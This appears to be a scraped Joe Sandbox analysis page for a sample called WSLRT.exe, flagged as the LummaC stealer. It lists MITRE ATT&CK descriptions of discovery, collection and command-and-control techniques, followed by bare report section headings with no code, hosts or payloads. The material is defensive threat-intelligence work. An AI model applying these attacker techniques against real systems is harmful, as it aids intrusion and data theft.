Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report WSLRT.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Windows Analysis Report
WSLRT.exe